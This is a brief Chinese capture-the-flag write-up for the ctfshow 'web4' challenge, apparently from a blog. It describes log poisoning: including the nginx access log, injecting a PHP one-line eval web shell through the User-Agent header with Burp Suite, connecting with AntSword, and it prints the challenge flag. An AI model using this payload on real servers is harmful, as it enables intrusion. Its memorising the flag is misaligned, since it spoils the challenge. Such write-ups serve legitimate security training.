打开之后发现和web3有点像,但是用之前的方法做不出来了
传参url=/var/log/nginx/access.log获取日志目录
使用burpsuite抓包
在User-Agent中加入一句话木马
<?php @eval($_POST['a'];?>
使用蚁剑连接
得到flag
ctfshow{f755138b-0c50-4507-9cb2-67835c95ae08}
标签:log,传参,web4,burpsuite,Agent,67835c95ae08,ctfshow
来源: https://www.cnblogs.com/string-Xrx/p/15428874.html